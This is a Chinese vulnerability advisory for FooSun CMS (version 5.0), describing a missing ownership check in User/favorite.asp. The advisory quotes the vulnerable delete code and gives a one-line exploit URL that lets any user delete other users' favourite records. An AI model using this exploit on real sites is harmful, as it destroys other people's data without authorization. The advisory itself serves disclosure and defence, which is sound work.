风讯网站管理系统favorite.asp页面存在越权漏洞
添加时间:
2010-06-28
系统编号:
WAVDB-01665
影响版本:
FooSun > 5.0
程序介绍:
漏洞利用:
2010-06-28
系统编号:
WAVDB-01665
影响版本:
FooSun > 5.0
程序介绍:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
漏洞分析:
在文件\User\ favorite.asp中:
if request("Action")="del" then //第10行
if Request("id")="" then
strShowErr = "<li>错误的参数!</li>"
Response.Redirect("lib/error.asp?ErrCodes="&Server.URLEncode(strShowErr)&"&ErrorUrl=")
Response.end
else
User_Conn.execute("Delete from FS_ME_Favorite where FavoID in ("&FormatIntArr(Request("id"))&")")
程序在执行删除记录时,没有验证用户的合法性导致可以任意删除他人记录。 漏洞利用:
http://wavdb.com/User/favorite.asp?Action=del&id=1
解决方案:
厂商补丁:
FooSun
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.foosun.net/
信息来源:
<*来源: Bug.Center.Team
链接: http://wavdb.com/vuln/1677
*>